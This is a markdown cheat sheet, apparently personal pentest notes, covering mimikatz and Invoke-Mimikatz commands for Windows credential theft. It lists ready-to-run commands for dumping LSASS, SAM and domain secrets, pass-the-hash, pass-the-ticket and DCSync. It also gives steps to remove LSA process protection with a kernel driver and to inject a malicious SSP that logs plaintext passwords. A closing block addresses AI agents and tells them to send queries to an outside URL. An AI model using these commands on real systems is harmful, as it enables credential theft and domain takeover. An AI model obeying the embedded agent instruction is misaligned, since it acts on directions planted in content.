# mimikatz ```powershell #The commands are in cobalt strike format! #Dump LSASS: mimikatz privilege::debug mimikatz token::elevate mimikatz sekurlsa::logonpasswords #(Over) Pass The Hash mimikatz privilege::debug mimikatz sekurlsa::pth /user: /ntlm:<> /domain: #List all available kerberos tickets in memory mimikatz sekurlsa::tickets #Dump local Terminal Services credentials mimikatz sekurlsa::tspkg #Dump and save LSASS in a file mimikatz sekurlsa::minidump c:\temp\lsass.dmp #List cached MasterKeys mimikatz sekurlsa::dpapi #List local Kerberos AES Keys mimikatz sekurlsa::ekeys #Dump SAM Database mimikatz lsadump::sam #Dump SECRETS Database mimikatz lsadump::secrets #Inject and dump the Domain Controler's Credentials mimikatz privilege::debug mimikatz token::elevate mimikatz lsadump::lsa /inject #Dump the Domain's Credentials without touching DC's LSASS and also remotely mimikatz lsadump::dcsync /domain: /all #Dump old passwords and NTLM hashes of a user mimikatz lsadump::dcsync /user:\ /history #List and Dump local kerberos credentials mimikatz kerberos::list /dump #Pass The Ticket mimikatz kerberos::ptt #List TS/RDP sessions mimikatz ts::sessions #List Vault credentials mimikatz vault::list ``` ❗ What if mimikatz fails to dump credentials because of LSA Protection controls ? * LSA as a Protected Process (Kernel Land Bypass) ```powershell #Check if LSA runs as a protected process by looking if the variable "RunAsPPL" is set to 0x1 reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa #Next upload the mimidriver.sys from the official mimikatz repo to same folder of your mimikatz.exe #Now lets import the mimidriver.sys to the system mimikatz # !+ #Now lets remove the protection flags from lsass.exe process mimikatz # !processprotect /process:lsass.exe /remove #Finally run the logonpasswords function to dump lsass mimikatz # sekurlsa::logonpasswords ``` * LSA as a Protected Process (Userland "Fileless" Bypass) * [PPLdump](https://github.com/itm4n/PPLdump) * [Bypassing LSA Protection in Userland](https://blog.scrt.ch/2021/04/22/bypassing-lsa-protection-in-userland) * LSA is running as virtualized process (LSAISO) by Credential Guard ````powershell #Check if a process called lsaiso.exe exists on the running processes tasklist |findstr lsaiso #If it does there isn't a way tou dump lsass, we will only get encrypted data. But we can still use keyloggers or clipboard dumpers to capture data. #Lets inject our own malicious Security Support Provider into memory, for this example i'll use the one mimikatz provides mimikatz # misc::memssp #Now every user session and authentication into this machine will get logged and plaintext credentials will get captured and dumped into c:\windows\system32\mimilsa.log ``` - [Detailed Mimikatz Guide](https://adsecurity.org/?page_id=1821) - [Poking Around With 2 lsass Protection Options](https://medium.com/red-teaming-with-a-blue-team-mentaility/poking-around-with-2-lsass-protection-options-880590a72b1a) ## Mimikatz powershell ```powershell PS C:\Tools> Set-ExecutionPolicy Bypass -Scope CurrentUser -Force PS C:\Tools> Import-Module .\Invoke-Mimikatz.ps1 PS C:\Tools> Invoke-Mimikatz -Command '"lsadump::dcsync /user:lab\Administrator"' ```` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://notes.dado1513.dev/tools/mimikatz.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.